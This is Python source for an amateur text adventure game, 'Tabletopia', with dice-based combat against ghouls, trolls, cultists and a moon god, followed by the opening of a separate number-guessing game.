int(input(f\"Choose your shield {shields}: \"))\n self.shield = Shield(choice)\n self.dmg += self.strength\n print(\"You're stronging, Sir\")\n\n elif self.race == \"Wizard\":\n spells = [f\"{spell.value}-{spell.name}\" for spell in Spell]\n spells = \", \".join(spells[:-1]) + \" or \" + spells[-1]\n choice = int(input(f\"Choose your weapon {spells}: \"))\n self.spell = Spell(choice)\n if self.spell == Spell.Fireball: \n self.spell = Spells[\"Fireball\"]\n self.dmgType = self.spell[\"dmgType\"]\n if self.spell == Spell.IceStorm:\n self.spell = Spells[\"IceStorm\"]\n self.dmgType = self.spell[\"dmgType\"]\n if self.spell == Spell.LightningBolt:\n self.spell = Spells[\"LightningBolt\"]\n self.dmgType = self.spell[\"dmgType\"]\n resistances = [f\"{resistance.value}-{resistance.name}\" for resistance in Resistance]\n resistances = \", \".join(resistances[:-1]) + \" or \" + resistances[-1]\n choice = int(input(f\"Choose your shield {resistances}: \"))\n self.resistance = Resistance(choice)\n self.dmg += self.intelligence\n 
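# provisional value; calcStats() later recomputes dmg as 10 + intelligence + the spell's dmgBonus\n            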
print(\"May your magic burn bright\")\n\n elif self.race == \"Rogue\":\n weapons = [f\"{weapon.value}-{weapon.name}\" for weapon in Weapon]\n weapons = \", \".join(weapons[:-1]) + \" or \" + weapons[-1]\n choice = int(input(f\"Choose your weapon {weapons}: \"))\n self.weapon = Weapon(choice)\n if self.weapon == Weapon.Warhammer:\n self.weapon = Weapons[\"Warhammer\"]\n self.dmgType = self.weapon[\"dmgType\"]\n self.dmgBonus = self.weapon[\"dmgBonus\"]\n if self.weapon == Weapon.Longsword:\n self.weapon = Weapons[\"Longsword\"]\n self.dmgType = self.weapon[\"dmgType\"]\n self.dmgBonus = self.weapon[\"dmgBonus\"]\n if self.weapon == Weapon.Spear: \n self.weapon = Weapons[\"Spear\"]\n self.dmgType = self.weapon[\"dmgType\"]\n self.dmgBonus = self.weapon[\"dmgBonus\"]\n tools = [f\"{tool.value}-{tool.name}\" for tool in Tool]\n tools = \", \".join(tools[:-1]) + \" or \" + tools[-1]\n choice = int(input(f\"Choose your tool {tools}: \"))\n self.tool = Tool(choice)\n self.dmg += self.dexterity\n print(\"Happy hunting\")\n \n#same as the above character template but for monsters, much shorter\nclass monster:\n def __init__(self, name, hp, damage, weakness, blockedBy, xp):\n self.name = name\n self.hp = hp\n self.damage = damage\n self.weakness = weakness\n self.blockedBy = blockedBy \n self.xp = xp\n def __str__(self):\n return f\"{self.name}{self.weakness}{self.blockedBy}()\"\n \n #First attempts at making a combat system, make dmg a variable thats set in classes and then modified based off of stats.Give weapons a strength to match weaknesses \n #Based on a combat system that I saw on stack overflow. Works a bit differently and is expanded but that's where I got the general form of it. \n #Potentially have weakness and resistance be dictionarys and use the check for key function with the input of the players dmg to check\nclass combat:\n def __init__(self):\n calcStats()\n self.round = 0\n self.gameOver = False\n self.playerDmg = 0\n self.opponentDmg = 0 \n def newRound(self):\n self.round += 1\n print(f\"\\n*** Round: {self.round} ***\\n\") \n def checkWin(self,player, opponent):\n if opponent.hp <= 0:\n self.gameOver = True\n print(\"You win\")\n player.xp += opponent.xp \n elif player.hp <= 0:\n print(\"You have died\")\n quit()\n def takeTurn(self,player,opponent):\n roll = random.randint(1,20)\n self.playerDmg = 0 \n roll += player.dexterity/5 \n if player.dmgType == opponent.weakness:\n print(\"Your dmg type seems particularly strong against this monster, roll + 5!\")\n roll += 5 \n if roll >= 20:\n print(f\"You rolled a {roll} for attacking\")\n self.playerDmg = (player.dmg + random.randint(1,10))*player.critMultiplier\n self.playerDmg = round(self.playerDmg)\n opponent.hp = opponent.hp - self.playerDmg\n print(\"\\033[1;31;40m POWER LEVELS OVER 9000!!!\\033[0m\") \n elif roll >= 15:\n print(f\"You rolled a {roll} for attacking\")\n self.playerDmg = (player.dmg + random.randint(1,10))*(player.critMultiplier/2)\n self.playerDmg = round(self.playerDmg)\n opponent.hp = opponent.hp - self.playerDmg\n print(f\"Critical Hit!\")\n elif roll < 10:\n print(f\"You rolled a {roll} for attacking\")\n print(\"you missed!\")\n else:\n print(f\"You rolled a {roll} for attacking\")\n self.playerDmg = (player.dmg+ random.randint(1,10))\n self.playerDmg = round(self.playerDmg)\n opponent.hp = opponent.hp - self.playerDmg\n print(f\"You land a hit\")\n def monsterTurn(self,player,opponent):\n roll = random.randint(1,20)\n if player.resistance == opponent.blockedBy or player.shield == opponent.blockedBy:\n 
print(\"Your defenses seem particularly strong against this creature, roll + 5!\")\n roll += 5 \n if roll >= 15:\n print(f\"You rolled a {roll} for defense \") \n print(\"\\033[32mTanked that hit like a boss\\033[0m\")\n self.opponentDmg = ((opponent.damage + random.randint(1,10))/2) - player.dmgStop\n player.hp = player.hp - self.opponentDmg\n else:\n print(f\"You rolled a {roll} for defense \") \n print(\"You take a solid hit\")\n self.opponentDmg = ((opponent.damage + random.randint(1,10))) - player.dmgStop\n player.hp = player.hp - self.opponentDmg \n def displayResult(self,player,opponent):\n if player.race == 'Wizard': \n print(f\"{player.name} blasted a {player.spell['Name']} at {opponent.name} it dealt {self.playerDmg} {player.dmgType} dmg.\")\n print(f\"{opponent.name} attacked {player.name} they dealt {self.opponentDmg} dmg\")\n print(f\"{opponent.name} hp:{opponent.hp}\")\n print(f\"{player.name} hp:{player.hp}\")\n else:\n print(f\"{player.name} used a {player.weapon['Name']} on {opponent.name} it dealt {self.playerDmg} {player.dmgType} dmg.\")\n print(f\"{opponent.name} attacked {player.name} they dealt {self.opponentDmg} dmg\")\n print(f\"{opponent.name} hp:{opponent.hp}\")\n print(f\"{player.name} hp:{player.hp}\")\n \ndef playeracterSelect():\n print(\"Let's start with your name: \") \n name = input() \n print(\"Good luck, \" +name+ \".\") \n classes = [\"w\",\"r\",\"z\"]\n print(\"Next we'll need your class. What kind of adventure are you?\")\n userInput = \"\"\n global player\n player = ()\n while userInput not in classes:\n print(\"Options: (r)ogue/(w)arrior/wi(z)ard\")\n userInput = input()\n if userInput == \"r\":\n player = char('Rogue', name, 100, 10, 18, 12, 14, 16)\n player.selectThings()\n playerStart()\n elif userInput == \"z\":\n player = char('Wizard', name, 75, 8, 10, 10, 22, 14)\n player.selectThings()\n playerStart()\n elif userInput == \"w\":\n player = char('Warrior', name, 125, 18, 14, 14, 8, 10) \n player.selectThings()\n playerStart()\n else: \n print(\"Please enter a valid option.\")\n\ndef playerStart():\n actions = [\"l\",\"r\",\"f\"]\n print(\"You begin in a dusty room made of cobbled stone. There are 3 paths.\")\n userInput = \"\"\n while userInput not in actions:\n print(\"Options: (l)eft/(r)ight/(f)orward\")\n userInput = input()\n if userInput == \"f\":\n ghoulGames()\n elif userInput == \"r\":\n longHallway()\n elif userInput == \"l\":\n trollBridge()\n else: \n print(\"Please enter a valid option.\")\n\n#First room that you find by going forwards. Requires a stat check to pass the course\n#if they opt to fight or fail the course it initiates combat with the ghoul\n#upon completeing the games playeracters with a high wis stat can find a secret room\n \ndef ghoulGames():\n actions = [\"p\",\"f\",\"t\"]\n print(\"Welcome young\",player.race,\"to the Ghoul Games. 
Announces an undead ringmaster\")\n print(\"To escape my room you must prove your worth in my obstacle course\")\n userInput = \"\"\n while userInput not in actions:\n print(\"Options: (p)lay along/(f)ight the ghoul/(t)urn and run\")\n userInput = input()\n if userInput == \"f\":\n vsGhoul() \n elif userInput == \"p\":\n if player.dexterity >= 16 or player.strength >= 16:\n print(\"Thanks to your athletcism you manage to duck, dodge, and weave through the obstacles\")\n print(\"'Well done young \",player.race,\" take this amulet as a testament to your feat' exclaims the Ringmaster before vanishing into a mist\")\n print(\"As you don the amulet you feel a sharp burst of magical energy course through you, making you faster\")\n player.dexterity = player.dexterity + 2\n player.wisdom = player.wisdom + 2\n if player.wisdom < 18:\n print(\"A single door opens on the left wall of the room\")\n input(\"press enter to continue\")\n longHallway()\n else:\n print(\"While you do notice a door open to the left that seems too obvious a route for catacomb such as this.\")\n print(\"Your trained eyes, now heightened by the amulet, notice the seems of a small trapdoor below the ringmaster.\")\n print(\"Unable to resist the same curiosity that brought you deep underground you slip into the hatch, barely able\")\n print(\"to hear the ringmaster's cries of protest behind you\")\n input(\"press enter to continue\")\n treasureRoom()\n else:\n print(\"You make it part way through the course but you lose your grip on a rope and fall\")\n print(\"partially into a pool of lava, singeing your leg\")\n print(\"'Bah, what a poor showing. You must die for wasting my audience's valuable time'\")\n player.hp = player.hp - 15\n checkForDead()\n vsGhoul() \n elif userInput == \"t\":\n print(\"You find the door has slammed closed behind you\")\n ghoulGames()\n else: \n print(\"Please enter a valid option.\")\n \n#First combat, player fights the ghoul and either dies or gains access to long hallway or treasure room\n\ndef vsGhoul():\n actions = [\"t\",\"d\"]\n print(\"hohoho, I see you have chosen death, young adventurer.\")\n ghoul = monster('ghoul', 225, 8, 'Fire', Resistance, 10 )\n currentCombat = combat() \n input(\"Press enter to continue \")\n while not currentCombat.gameOver:\n currentCombat.newRound()\n currentCombat.takeTurn(player,ghoul)\n currentCombat.monsterTurn(player,ghoul)\n currentCombat.displayResult(player,ghoul)\n currentCombat.checkWin(player,ghoul)\n input(\"Press enter to continue\")\n levelUp()\n print(\"\"\"As the ghoul dies he drifts apart into whisps \"Beware the beast that lays within, you don't know the powers you play with\" \"\"\")\n print(\"\"\"\n A small hatch pop open from underneath where the ghost died. You think you can see treasure down there but you're not too sure.\n You also notice a door off to the side that looks much less rewarding, but also much less ominous.\n \"\"\")\n print(\"Options: small (t)rapdoor/(d)oorway \")\n userInput = \"\"\n while userInput not in actions:\n userInput = input()\n if userInput == \"d\":\n longHallway()\n elif userInput == \"t\":\n treasureRoom()\n else:\n print(\"please enter a valid option\")\n \ndef treasureRoom():\n actions = [\"s\", \"a\", \"w\"]\n print(\"\"\"\n As you duck down into the trapdoor you're greeted by luminescent piles of gold, amongst which you spy \n multiple magic weapons. 
You get the feeling that these are powerful enough that you can probably only handle using one of them.\n There's a a jagged and cruel looking sword cut from obsidian, some well crafted dwarven platemail, and a steel wand inlayed with \n saphires all resting on pedestals.\n \"\"\")\n userInput = \"\"\n while userInput not in actions:\n userInput = input(\"Options: Take (s)word/Take (a)rmor/Take (w)and\")\n ending = \"Taking your newfound item you travel through a plain wood door at the end of the room, deeper into the catacombs.\"\n if userInput == \"s\":\n print(\"\"\"\n As you grasp the hilt the hilt of the black stone blade you feel infernal strength race through you. You feel both stronger and as though you \n would take less damage from fire.\n \"\"\")\n player.resistance = 'Fire'\n player.weapon = Weapons[\"ObsidianEdge\"]\n player.strength += 5\n player.dexterity += 2 \n calcStats()\n print(ending)\n dungeon() \n elif userInput == \"a\":\n print(\"\"\" \n Picking up the heavy suit of armor feels like a momentous task, let alone donning it. Thankfully, after some manuevering you manage to get it on\n you definately feel like regardless of whats attacking you this will help prevent damage. \n \"\"\")\n player.dmgStop = 5\n print(ending)\n dungeon()\n elif userInput == \"w\":\n print(\"\"\" \n As you pick up the wand you feel a jolt of electricity course through you, your senses seem to be moving faster. \n or at least everything else seems slower. Your magic feels more powerful as well \n \"\"\")\n player.wisdom += 4\n player.intelligence += 4\n calcStats()\n print(ending)\n dungeon()\n else:\n print(\"please enter a valid option\")\n \ndef trollBridge():\n actions = [\"a\",\"f\",\"t\", \"j\"]\n print(\"\"\"\n As you wander the tunnels you find and step through a door into large chamber with a chasm nearly 20 ft across in the middle, thankfully there's a well built stone bridge crossing it.\n The only issue is that there's a lorge troll standing in the middle of the bridge, munching on an apple. 'Why hello there little one, you must want to be exploring of the dungeon, yes? \n I'm sorry to say that I only let people who answer my riddle pass' declares the troll. \n While he doesn't seem particularly hostile the troll is quite large and has what appears to be a large mace sitting next to him. \n \"\"\")\n\n userInput = \"\"\n while userInput not in actions:\n print(\"Options: (a)nswer/(f)ight/(t)urn back/(j)ump across\")\n userInput = input()\n if userInput == \"a\":\n print(\"\"\"'Ohh yes, this is very good, it's been a long time since something so living and fleshy wanted to talk to me. Here's the riddle:\n My life can be measured in hours,\n\n I only serve to be devoured.\n\n Slim, I am quick.\n\n Fat, I am slow.\n\n Wind is my foe.\n \n What am I?\n\n It's really good isn't it? I came up with it myself!'\n \"\"\")\n playerAnswer = \"\"\n answer = \"candle\"\n attempts = 0\n print(\"So anyways, I will need an answer if imma let you pass. 
Because it's been s long since I've seen anyone I'll give you 3 tries(answer in lowercase)\")\n while answer not in playerAnswer:\n print(f\"You have {3 - attempts} remaining little one\")\n playerAnswer = input()\n if answer not in playerAnswer:\n print(\"Sorry, but that's not it\")\n attempts += 1 \n if attempts == 2:\n print(\"you have one more try, make it a good one \")\n elif attempts == 3:\n print(\"Oh well, we can't all be as smart as me I suppose\")\n trollFight()\n \n## toDo - Make an option to double down for a reward\n print(f\"'Oh excellent, so well done little {player.race}. Here, you may cross my bridge' the troll steps aside and lets you pass\")\n print(\"As you turn away from the troll and continue down the passage the air thickens and you think you hear voices ahead\")\n player.intelligence += 2\n print(\"Player intelligence + 2!\")\n input(\"press enter to continue\")\n cultGathering() \n elif userInput == \"j\":\n print(\"You decide that you'd rather trust your own athleticism than the word of a troll or his bridge\")\n if player.strength >= 20 or player.dexterity >= 20:\n print(\"You make a running jump and manage to sail over the chasm. Tucking into a roll on the other side you rapidly pop to your feet.\")\n print(\"The troll turns around 'Oh ho, I see. Well aren't you quite the individual, don't even need my bridge. Perhaps you could could actually survive what lay ahead.\")\n print(\"As you turn away from the troll and continue down the passage the air thickens and you think you hear voices ahead\")\n input(\"press enter to continue\")\n cultGathering() \n else:\n print(\"\"\"\n Unfortunately you overestimated you abilities and while you do make a running jump you realize all too late that you aren't going to make it.\n You tumble down into the darkness.\n \"\"\")\n player.hp -= 40\n checkForDead()\n ## toDo - make a race system that gives abilities and stats\n print(\"Thankfully you were in good enough shape to survive the fall. You slowly come to crumpled in the dark on cobbles wet with your blood\")\n time.sleep(2)\n dungeon()\n elif userInput == \"f\":\n print(\"You draw your breath and prepare for battle hopeing to get the first strike in before the eventual battle.\")\n trollFight()\n elif userInput == \"t\":\n print(\"You find the door has slammed closed behind you\")\n trollBridge()\n else: \n print(\"Please enter a valid option.\")\n trollBridge()\n \n\ndef trollFight ():\n troll = monster('troll', 400, 12, ['Fire','Slashing'], Shields, 25)\n actions = [\"c\", \"e\", \"p\"]\n currentCombat = combat()\n input(\"Press enter to continue \")\n while not currentCombat.gameOver:\n currentCombat.newRound()\n currentCombat.takeTurn(player,troll)\n currentCombat.monsterTurn(player,troll)\n currentCombat.displayResult(player,troll)\n currentCombat.checkWin(player,troll)\n input(\"Press enter to continue\")\n levelUp()\n print(\"\"\"\n The troll crashes to the ground, dropping his mace, deafeated. You see the yawning passsage way beyond the bridge is dimly lit and appears to almost be\n leaking darkness into the rest of the room. With the door locked behind you the only other option seems to be down the pit beneath the bridge. There's a well worn \n rope tied to the edge that you could maybe shimmy down, but it would be very difficult. If only you had something like a grappling hook to tie up here.... Also, the trolls mace rests heavily on the ground. 
It's incredibly massive but you\n could try to lift it...\n \"\"\")\n userInput = \"\"\n while userInput not in actions:\n print(\"Options: (c)limb down/(e)nter the cave/(p)ickup the mace\")\n userInput = input()\n if userInput == \"c\":\n if player.dexterity >= 20 or player.strength >= 24:\n print(\"You nimbly wind your way down the threadbare rope into the darkness\")\n dungeon()\n elif \"GrapplingHook\" in player.tools:\n print(\"Thankfully you came prepared. You tie the grapple up here and descend into the darkness\")\n dungeon()\n else:\n print(\"Unfortunately your hands slip and you lose grip on the rope, tumbling into the dark.\")\n player.hp = player.hp - 30\n dungeon()\n elif userInput == \"e\":\n cultGathering()\n elif userInput == \"p\":\n if player.strength >= 22:\n print(\"Thanks to your absolute immensity you manage to heave the mace over your shoulder. This thing probably deals some serious damage\")\n player.weapon = Weapons[\"TrollMace\"]\n print(\"Options: (c)limb down/(e)nter the cave\")\n playerAnswer = input()\n if playerAnswer == \"c\":\n dungeon()\n elif playerAnswer == \"e\":\n cultGathering()\n else:\n print(\"please enter a valid option\")\n else:\n print(\"You find that you can barely budge the mace, let alone lift it. Sadge.\")\n userInput = \"\"\n else:\n print(\"please enter a valid option\")\n\ndef longHallway(): \n actions = [\"a\",\"i\",\"t\"]\n print(\"You step into a long hallway, dimly lit and dank. The walls seems to covered in a scrawl that looks like a language, though not one that you know\")\n print(\"At the end of the hallway you see a tall door carved of ebony.\")\n print(\"The door is covered in latches and locks on your side... meaning there must have been, or may still be, something trapped in there\")\n userInput = \"\"\n while userInput not in actions:\n print(\"Options: (a)pproach the door/(i)nvestigate the walls/(t)urn and run\")\n userInput = input()\n if userInput == \"a\":\n print(\"\"\"\n As you walk down the hallway you can't help but feel like the air clings to you in an unnatural way,\n making the air itself feel thick and oily. Upon reaching the door you realize it's even larger than you initially thought.\n The door is easily over 9ft tall and the locks are rusted over. Theres a series of claw marks on the sarrounding floor and walls. \n \"\"\")\n print(\"Options: (o)pen the door/(b)ack away\")\n choices = [\"o\",\"b\"]\n choice = input()\n while choice not in choices:\n if choice == \"o\":\n print(\"You slowly unlock the old rusty locks, grinding the bolts in their grooves. The tall door swings open with an unnatural silence.\")\n denOfTheBeast()\n elif choice == \"b\":\n longHallway()\n else:\n print(\"please enter a valid option\")\n \n\n elif userInput == \"i\":\n print(\"\"\"\n As you approach the wall you begin to hear whispering from the edges of your vision, \n it's almost as though some unseen force is laughing at you. 
Now that the writing comes into focus it takes\n nearly all your willpower to to stay focused on the swirling caligraphy of the text as the laughing gets louder.\n It's beginning to sound like you yourself are also laughing.\n \"\"\")\n if player.intelligence >= 18:\n print(\"\"\"\n Thankfully because of your rigorous mental training you find yourself able to fight through the laughter and find your own mental voice.\n You make out the text \"Here, imprisoned, lies Krushok, Firstborn Tyrant of the Moon\" underneath seems to be inscribed some kind of spell that you\n can copy down.\n \n \"Ecliptic beam\" \n \"\"\")\n player.spell = Spells[\"EclipticBeam\"]\n userInput =\"\"\n longHallway()\n else:\n print(\"\"\"\n As you get within range of touching the wall the voices grow so loud that they begin to drown out your thoughts\n until all you can experience is the mania that rolls over you. You stumble into the wall and hit your head on the stone, knocking yourself out.\n When you come too it the wall seems perfectly mundane and you can't see any writing. You feel like a bit of your sanity has been crippled. But, perhaps, you gained a bit of knowledge. \n As you walk away from the wall you begin to hear the whispers again...\n \"\"\")\n player.wisdom = player.wisdom - 2\n player.intelligence = player.intelligence + 1\n player.hp = player.hp - 10\n input(\"Press enter to continue\")\n longHallway()\n elif userInput == \"t\":\n print(\"You turn and exit the way you came\")\n playerStart()\n else:\n print(\"Please enter a valid option\")\n\n## toDo - denOfTheBeast, dungeon, cultGathering -- dungeon should have chest that requires rogue tools\n## toD0 - Make list of weapons into a dictionary so I can jsut add new weapons with new types whenever and have it be easier(done)\n## toDo - made weaknesses into a list instead of just one input. see if that breaks everything??(It sort of does)\ndef dungeon():\n actions = [\"h\", \"i\", \"c\"]\n chestUnlocked = False\n userInput = \"\"\n print(\"\"\" \n You find yourself in the middle of what could only be a dungeon. The ceiling is caved in, allowing for a trickle of light from above. Softly illuminating a dank passageway \n lined with the iron bars of prison cells, that continues long into the dark. In one of the cells you see an ironbound chest, but you're not sure you can brute force these\n bars or this chest. Another cell seems to have a prisoner hanging by chains. The bedraggled figure dangles from their wrists, barely alive.\n From further ahead you hear breath. Breath that echoes between the walls and leaves your mind feeling empty, a deep and primal rasp. Something is sleeping.\n \"\"\")\n while userInput not in actions:\n print(\"Options: (h)elp prisoner/(i)nvestigate chest/(c)ontinue down\")\n userInput = input() \n if userInput == \"h\":\n prisonerOptions = [\"h\", \"l\"]\n prisonerInput = \"\"\n while prisonerInput not in prisonerOptions:\n print(\"\"\" You cross the hallway and approach the groaning prisoner. He dangles by locked iron manacles \"Oh, hello there. Is that someone? It's been so long\n I can hardly see anymore.\" he creaks. \"Will you help me?\" \"\"\")\n if player.wisdom >= 18:\n print(\"As you listen to the man you get an eery feeling from him. 
Some part of this individual seems coiled to strike.\")\n prisonerInput = input(\"Options: (h)elp with the manacles/(l)eave him be \") \n if prisonerInput == \"h\":\n print(\"\"\"\"As you approach the prisoner he cackles \"Bahah, someone is a bit too trusting.\" The manacles detach from the walls, elongating, shifting, and hardening\n until they ressemble spikes made of bone prottruding from the forearms of the prisoner. With teeth now bared to reveal large fangs, the vampire lunges. \n \"\"\")\n vampireFight()\n elif prisonerInput == \"l\":\n print(\"\"\" \"Wait, wait, are you just leaving me? I can help you! You'll never live if you go alone!\" \"\"\")\n dungeon()\n else:\n print(\"please enter a valid option\")\n elif userInput == \"i\":\n chestInput = \"\"\n chestOptions = [\"s\",\"p\",\"t\"]\n while chestInput not in chestOptions:\n print(\"As you stand in front of the chest it appears to be mildly rotten but it \")\n chestInput = input(\"Options: (p)ick lock/(s)mash it/(tu)rn away\")\n if chestInput == \"t\":\n dungeon()\n elif chestInput == \"p\":\n if chestUnlocked == False:\n if player.tool == Tool[\"Lockpick\"]:\n print(\"You succesfully open the chest and pull out a small ornate crystalline bottle filled with a viscous red fluid inside. This health potion will save you from death once\")\n player.hpPotions += 1\n chestUnlocked = True\n dungeon() \n else:\n print(\"You don't have the tools or expertise to do that.\")\n input(\"Press enter to continue\")\n dungeon()\n else:\n print(\"The chest is already open, leave dweebus.\")\n input(\"Press enter to continue\")\n dungeon()\n elif chestInput == \"s\":\n if chestUnlocked == False:\n if player.strength >= 20:\n print(\"\"\"Using your massive muscles you tear the chest in twain. Unfortunately you seem to have broken th small bottle that was in the chest.\"\"\")\n chestUnlocked == True\n dungeon()\n else:\n print(\"Unfortunately you're too weak. The chest sits there mockingly.\")\n dungeon()\n else:\n print(\"The chest is already in pieces.\")\n dungeon()\n elif userInput == \"c\":\n print(\"As you slowly walk down the corridor, away from the pleas of the prisoner, you feel an unnatural cold wash over you and hear chanting ahead.\")\n cultGathering()\n else:\n print(\"please enter a valid option.\")\n \ndef vampireFight():\n vampire = monster(\"vampire\", 50, 12, Spells, Shields, 15)\n currentCombat = combat() \n input(\"Press enter to continue \")\n while not currentCombat.gameOver:\n currentCombat.newRound()\n currentCombat.takeTurn(player,vampire)\n currentCombat.monsterTurn(player,vampire)\n currentCombat.displayResult(player,vampire)\n currentCombat.checkWin(player,vampire)\n input(\"Press enter to continue\")\n levelUp()\n print(\"As you look around the small dungeon your fight with the vampire smashed the old chest, breaking whatever was inside. It looks like your only choice is to continue forward\")\n time.sleep(2)\n cultGathering()\n\ndef cultGathering():\n actions = [\"s\",\"a\"]\n print(\"\"\"\n As you walk down the hallway you begin to hear eerie voices chanting. 
Rounding the corner you see 3 cultists standing around a pile of dead sheep.\n It looks like you might be able to sneak around them, but at the same time you get a bad feeling about what would happen if they completed their ritual.\n \"\"\")\n userInput = \"\"\n while userInput not in actions:\n print(\"Options: (s)neak around/(a)mbush them\")\n global ambushed \n ambushed = False\n userInput = input()\n if userInput == \"s\":\n if player.dexterity >= 16:\n print(\"\"\"You successfully stalk around the room, as you sneak through the passageway at the end of the room you get a sinking feeling in your stomach\"\"\")\n denOfTheBeast()\n else:\n print(\"You attempt to sneak around the room but unfortunately you stumble and alert the cultists who quickly draw daggers and charge you.\")\n ambushed = True \n cultistFight() \n elif userInput == \"a\":\n print(\"Rushing right in you manage to get the drop on one of the cultists, killing him, before the other two draw their daggers and turn towards you.\")\n cultistFight()\n else: \n print(\"Please enter a valid option.\")\n quit()\n\ndef cultistFight():\n numCultists = 3\n cultistsKilled = 0\n global ambushed\n if ambushed == True:\n numCultists = 2\n while cultistsKilled < numCultists:\n currentCombat = combat() \n cultist = monster(\"cultist\", 70, 15, Weapons, Shields, 15)\n while not currentCombat.gameOver:\n currentCombat.newRound()\n currentCombat.takeTurn(player,cultist)\n currentCombat.monsterTurn(player,cultist)\n currentCombat.displayResult(player,cultist)\n currentCombat.checkWin(player,cultist)\n input(\"Press enter to continue\")\n cultistsKilled += 1\n print(\"One down\")\n levelUp()\n print(\"\"\"\n Standing over the bodies of the cultists you're drawn deeper into the dungeon towards the breathing.\n \"\"\")\n input(\"Press enter to continue\")\n denOfTheBeast()\n \n\ndef denOfTheBeast():\n rightHead = monster(\"Golden head\", 100 , 25, Weapons , Resistances, 15) \n leftHead = monster(\"Black head\", 150, 15, Weapons, Resistances, 15)\n krushok = monster(\"Krushok\", 400, 30, None, None, 55)\n actions = [\"l\",\"r\"]\n rightHeadDead = False\n leftHeadDead = False\n print(\"\"\" \n Upon entering the room you find yourself in what looks like a large ampitheater. You don't feel like you walked upwards at any\n point, yet you're somehow on a mountaintop. Over the edges of the ampitheater you can see down into the valley where little towns speckle the hillsides.\n In the middle\n of the ampitheater, illuminated by the light of the full moon, lies the source of the breathing. Shackles as large around as you\n bind every limb of a creature you don't recognize. It almost looks like a cerberous but the body is too feline and the heads look almost draconic, something\n about the lines of its face. Slightly more angular and rigid than they should be with smoke rising from the nostrils of the right head.\n Everything about this creature reeks of unnatural magic. \n\n As you take one quiet step into the ampitheater you hear the grinding of stone behind you as the passageway seemingly closes of its own accord. \n Disturbed by the grinding the right head lazily opens its eyes predatory inquisition, revealing eyes comsumed by a golden iris with a slitted\n pupil being the only break in the sheen. As the beast rises to its feat it creates almost no sound, save growl now emitting from the right head.\n Hastily looking around the circular ampitheater you don't see a way out. 
Maybe because of the chains you could run it in a circle and fight only one head\n but you have to choose quickly. Glancing at the approaching creature you see that its left head is completely blind, eyelids flicking over empty socket,\n that being said it also looks physically stronger than the left head. \n \"\"\")\n userInput = \"\"\n def rightHeadFight():\n currentCombat = combat()\n while not currentCombat.gameOver:\n currentCombat.newRound()\n currentCombat.takeTurn(player,rightHead)\n currentCombat.monsterTurn(player,rightHead)\n currentCombat.displayResult(player,rightHead)\n currentCombat.checkWin(player,rightHead)\n input(\"Press enter to continue\")\n levelUp()\n rightHeadDead = True \n if leftHeadDead == False:\n print(\"Cutting the right head down causes the left to roar in agony and spit fire at you.\")\n time.sleep(2)\n leftHeadFight()\n else:\n time.sleep(1)\n krushok()\n def leftHeadFight():\n currentCombat = combat()\n while not currentCombat.gameOver:\n currentCombat.newRound()\n currentCombat.takeTurn(player,leftHead)\n currentCombat.monsterTurn(player,leftHead)\n currentCombat.displayResult(player,leftHead)\n currentCombat.checkWin(player,leftHead)\n input(\"Press enter to continue\")\n levelUp()\n rightLeftDead = True \n if rightHeadDead == False:\n print(\"As the smoke from the left head dies the right head takes a deep breath through its nose. Picking up your scent it turns it's empty eyes to you.\")\n time.sleep(2)\n rightHeadFight()\n else:\n time.sleep(1)\n krushok()\n def krushok():\n # as you kill it the blood will flow out into the veins of what you now realize is an alter and then the moon cracks and Krushok comes out.\n print(\"\"\"\n As you triumphantly stand over the defeated beast you feel a sense of dread seep into you. Blood draining from the wounds of the giant creature begins to \n flow into veins cut in the stone, revealing the acropolis for what it is, an altar. The now blood soaked veins in the stone begin to form a pattern and the moon\n begins to glow red, cracks emerging in it that mimic the pattern in the altar. Before you can think to stop the bleeding the air is pulled from your lungs, drawn in\n by some kind of incredible gravity, just before you begin to see the moon crumple. Meteors and debris begin falling from the sky around you just as the shockwave hits, knocking\n you over just in time to see a small meteor hit the center of the altar, and stand up. \n \n Your mind travels back to your childhood fairy tales. Particularly one where the old gods chained an untameable evil inside the Moon to protect the Earth, Krushok.\n Now free, the Firstborn Tyrant of the Moon stands over 30ft tall and in the middle of the acropolis. His bottom half is covered in opulescent white scales and is lean and\n clawed like a dragon. His top half is gaunt from millenia of imprisonment but even with skin hugging the bones of his more human half he appears terrifyingly strong.\n Eyes milky white and scarred over, flexing his huge tattered raven wings stolen from Odin's stock, and a wrath unlike any other, Krushok turns towards you. 
With a noise like inverted\n                thunder, pulling you in, Krushok summons a spear of pure moonlight and stalks towards you\n                \"\"\")\n        currentCombat = combat()\n        # the enclosing `krushok` monster was shadowed by this inner function's own name,\n        # so rebuild the boss locally (same stats as the outer definition) before the fight\n        boss = monster(\"Krushok\", 400, 30, None, None, 55)\n        while not currentCombat.gameOver:\n            currentCombat.newRound()\n            currentCombat.takeTurn(player,boss)\n            currentCombat.monsterTurn(player,boss)\n            currentCombat.displayResult(player,boss)\n            currentCombat.checkWin(player,boss)\n            input(\"Press enter to continue\")\n        levelUp()\n        print(\"\"\"\n        With one final devastating blow you strike down the ancient god of death and bring peace to the Earth.\n        \n        If you got this far, congrats! Not only have you won but you have defied all my expectations and managed to beat the game.\n        \"\"\")\n\n    while userInput not in actions:\n        print(\"It looks like you'll have to fight the beast either way but if you circle it correctly you might be able to take it on one head at a time.\")\n        print(\"Options: (r)ight/(l)eft\")\n        userInput = input()\n        if userInput == \"l\":\n            leftHeadFight()\n        elif userInput == \"r\":\n            rightHeadFight()\n        else:\n            print(\"Please enter a valid option\")\n\nif __name__ == \"__main__\":\n    \n    while True:\n\n        \n        print(\"Welcome to the mystical land of Tabletopia\")\n        \n        print(\"As an avid traveler, you have decided to visit the Catacombs of a nearby temple.\")\n        \n        print(\"However, during your exploration, you find yourself lost.\")\n        \n        playeracterSelect()\n\n","repo_name":"00Sarge/TextAdventure","sub_path":"Final/Tabletopia_1.0.py","file_name":"Tabletopia_1.0.py","file_ext":"py","file_size_in_byte":44938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"848996216","text":"\"\"\" \n    PROJECT 02 : MAGIC NUMBER GAME\n    Author : Vansen Hengmeanrith AKA Chris\n    Email : vansenhengmeanrith17@kit.edu.kh\n    Created : 21 May 2019\n    Instructor : Kevin Sabbe\n    Language : Python\n\"\"\"\n\nimport random\n\n# Computer thinks of a random number from (1 to 100)\nmagicNumber = random.randrange(1,100+1)\n\n# Declare count for counting the number of times the player guesses\ncount = 0\n\n# Declare forever loop(s) and other loop(s)\nforeverLoop_One = True\nplayAgainLoop = True\n\n# Getting name input\nnameInput = input(\"Hello, what is your name?\\n>> \")\n\n# Getting the first guessed number\nguessTheNumberInput = input(\"Well \" + nameInput + \", try to guess the number I 